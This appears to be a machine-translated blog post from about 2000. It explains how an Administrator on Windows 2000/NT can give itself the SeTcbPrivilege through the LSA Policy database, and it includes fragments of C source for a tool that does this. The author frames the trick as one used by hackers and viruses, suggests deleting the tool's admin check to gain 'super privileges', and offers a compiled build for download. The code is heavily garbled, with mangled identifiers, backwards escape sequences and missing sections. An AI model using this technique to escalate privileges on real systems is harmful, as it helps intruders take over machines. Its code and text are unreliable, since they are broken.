How to exceed the Administrator permissions given by Windows2000! While big Admin right, but not the biggest NT security components There is one called Local Security Authority Protected Subsystem. When we landed at ADMINISTRATOR, according to the system default authorization, giving ADMINISTRATOR16 authorized below but a detailed list of which .SeChangeNotifyPrivilegeSeSecurityPrivilegeSeBackupPrivilegeSeRestorePrivilegeSeSystemtimePrivilegeSeShutdownPrivilegeSeRemoteShutdownPrivilegeSeTakeOwnershipPrivilegeSeDebugPrivilegeSeSystemEnvironmentPrivilegeSeSystemProfilePrivilegeSeProfileSingleProcessPrivilegeSeIncreaseBasePriorityPrivilegeSeLoadDriverPrivilegeSeCreatePagefilePrivilegeSeIncreaseQuotaPrivilege SechangeNotifyPrivilege is open. Others need to adjust token to open. After so much permissions, admin is so powerful, no other users have so much permissions. However, there are still a few powerful privileges. There is no admin. That is, setcbprivilege, and secreateTokenPrivilege. Setcbprivilege indicates that the current user's operation represents the system's operation, and SecreateTokenPrivilege is more naked to create permissions for any token. It is a unparalleled privilege. If anyone has these two privileges The rights in the NT world are too exaggerated. So, NT does not give any users in these two privileges. For the desire to rights, usually viruses, Hacker will find the highest permission. Now, due to NT protection, Get these 2 permissions directly. So you need to be bent. Since there is no direct API can increase the TOKEN privilege, we have to adjust user permissions through the LSA Policy library. Because user permissions are extracted in LSA Policy Come out. When the LSA Policy reservoir adds a privilege, the user can open the privilege in the next process. HEHE ... Admin Group has written rights to the LSA Policy library.: DDD ADM In no super privilege, LSA is extracted from the privilege of the user ... It's a cute serial set. :) Below is the program I wrote, open Administrator's setcbprivilege privilege. Although I set an admin check in the program But through a small amount of overwriting, you can get some super privileges when you can get some super privileges. You can usually move your brain. Of course, you can do it by deleting the administrator inspection. :) Of course, here is compiled Good version is available for download. / sec.cpp#define unicode # include
//// quit // void quit (int err) {if (Sid) delete Sid; if (ReferencedDomainName) delete ReferencedDomainName; if (UserRights) delete UserRights; if (TokenInformation) delete TokenInformation; if (token) CloseHandle (token) If (policyhandle) lsaclose (policyhandle); WPRINTF (L "/ N / NWRITTEN BY Lu Lin. 2000.1.30 / nLICENCE: FREE./N" :;if (err) {EXIT (0xc0000000);} else {EXIT 0);}}} void printprivilege (Luid_and_attributes * Luid) {Wchar Dispname [100]; ulong cb = 100; if (! LookuppprivileGename (0, & (Luid-> Luid), Dispname, & Cb) {WPRINTF (L "i Can't Translate Some Luid to PrivileGe! / N "); exit (1);} WPRINTF (L" / TPRIVILE:% S / N ", DispName); if (! _WCSICMP (DispName, L" setcbprivilege ") Owned = 1; switch (luid-> Attributes) {case SE_PRIVILEGE_ENABLED_BY_DEFAULT: wprintf (L "/ t / tThis privilege is enabled by default / n"); break; case SE_PRIVILEGE_ENABLED: wprintf (L "/ t / tThis privilege is enabled./ N "); break; case se_privilege_used_for_access: Wprintf (L" / T / TTHIS Privilege IS Used for access./n" );break;case 3: WPrintf (L "/ T / TTHIS Privilege is always on fo R You./N "; Break;case 0: Wprintf (L "/ t / tthis privilege you oo {wchar username [30]; ulong cb ; OSVERSIONINFO osv;? // if nt ZeroMemory (& osv, sizeof (osv)); osv.dwOSVersionInfoSize = sizeof (osv); GetVersionEx (& osv); if (! osv.dwPlatformId & VER_PLATFORM_WIN32_NT) {wprintf (L "This program only runs on NT "); quit (1);} /// Check if this thread is executed INSIDE Administrator's Context.//cb=30; GetuserName (Username ,&cb );if (_wcsicmp (username, l" administrator)) { WPrintf (l "logon as administrator first! / n"); quit (1);} WPRINTF (L "Windows NT% i.% i Build% I% S / N / N"
, Osv.dwMajorVersion, osv.dwMinorVersion, osv.dwBuildNumber, osv.szCSDVersion);} BOOL GetTextualSid (PSID pSid, // binary SidLPTSTR TextualSid, // buffer for Textual representation of SidDWORD dwBufferLen // required / provided TextualSid buffersize) {PSID_IDENTIFIER_AUTHORITY psia; DWORD dwSubAuthorities; DWORD dwSidRev = SID_REVISION; DWORD dwCounter; DWORD dwSidSize; // Validate the binary SID.if return FALSE (IsValidSid (pSid)!); // Get the identifier authority value from the SID.psia = GetSidIdentifierAuthority (pSid ); // Get the number of subauthorities in the SID.dwSubAuthorities = * GetSidSubAuthorityCount (pSid); // Compute the buffer length.// S-SID_REVISION- IdentifierAuthority- subauthorities- NULLdwSidSize = (15 12 (12 * dwSubAuthorities) 1) * sizeof (TCHAR); // Check input buffer length.// If too small, indicate the proper size and set last error.if (dwBufferLen
} // Add SID subauthorities to the string.//for (dwCounter = 0; dwCounter
Privileges; wprintf (L "/ nTotal privilege count:% i / n / n", TokenInformation-> PrivilegeCount); for (Count = 0; Count
http://blog.9cbs.net/ small stars /
